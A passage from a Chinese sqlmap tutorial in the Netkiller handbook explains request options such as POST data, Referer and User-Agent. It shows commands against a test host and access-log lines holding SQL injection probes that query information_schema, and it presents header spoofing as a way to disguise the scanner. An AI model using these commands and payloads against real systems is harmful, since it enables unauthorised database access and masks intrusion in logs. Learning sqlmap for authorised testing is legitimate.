3.3. Request参数

简介:

3.3.1. --method, --data

			
sqlmap -u "http://www.example.com/login.php" --method "POST" --data "user=neo&passwd=chen"
			
			

3.3.2. --cookie

3.3.3. --referer

$ sqlmap -u "http://172.16.0.44/test/testdb.php?id=12" --referer="http://www.google.com"
			

access.log输出

113.106.63.1 - - [10/Dec/2011:16:52:41 +0800] "GET /test/testdb.php?id=12%29%20AND%20%288621=8621 HTTP/1.1" 200 978 "http://www.google.com" "sqlmap/0.6.4 (http://sqlmap.sourceforge.net)"
113.106.63.1 - - [10/Dec/2011:16:52:41 +0800] "GET /test/testdb.php?id=12%29%29%20AND%20%28%282589=2589 HTTP/1.1" 200 980 "http://www.google.com" "sqlmap/0.6.4 (http://sqlmap.sourceforge.net)"
			

3.3.4. --user-agent

默认是 "sqlmap/0.6.4 (http://sqlmap.sourceforge.net)"

检查Your User Agent: http://whatsmyuseragent.com/

Chrome

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
			

IE9

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
			

Safari

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7
			

首先开启日志监控

tail -f /www/logs/access.log
			

伪装成Safari

$ sqlmap -u "http://172.16.0.44/test/testdb.php?id=12" --user-agent="Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7"
			

access.log输出结果

113.106.63.1 - - [10/Dec/2011:16:48:24 +0800] "GET /test/testdb.php?id=12%20AND%20ORD%28MID%28%28SELECT%200%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%202%2C%201%29%29%20%3E%203%20AND%201184=1184 HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7"
113.106.63.1 - - [10/Dec/2011:16:48:24 +0800] "GET /test/testdb.php?id=12%20AND%20ORD%28MID%28%28SELECT%200%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%202%2C%201%29%29%20%3E%201%20AND%201184=1184 HTTP/1.1" 200 2191 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7"
			

3.3.4.1. -a

3.3.5. --headers

3.3.6. --referer

3.3.7. auth

3.3.7.1. --auth-type

3.3.7.2. --auth-cred

3.3.8. --proxy

3.3.9. --threads

3.3.10. --delay

3.3.11. --timeout




原文出处:Netkiller 系列 手札
本文作者:陈景峯
转载请与作者联系,同时请务必标明文章原始出处和作者信息及本声明。

目录
相关文章
|
4月前
|
前端开发 JavaScript 网络安全
request.getSession().getAttribute 获取不到值,获取到的是null
这篇文章讨论了在使用前后端分离架构时,通过AJAX请求进行会话管理时遇到的跨域问题,导致`request.getSession().getAttribute`获取到的值为null。解决办法是设置`withCredentials=true`以允许跨域请求携带cookie,确保请求凭证得以传递。
request获取请求头的名称
request获取请求头的名称
request.getParameter、request.getParameterValues、request.getParameterMap用法
request.getParameter、request.getParameterValues、request.getParameterMap用法
158 0
|
应用服务中间件
|
Java
Request和Response对象详解
Request和Response对象详解
221 0
Request和Response对象详解
|
Web App开发 iOS开发 Windows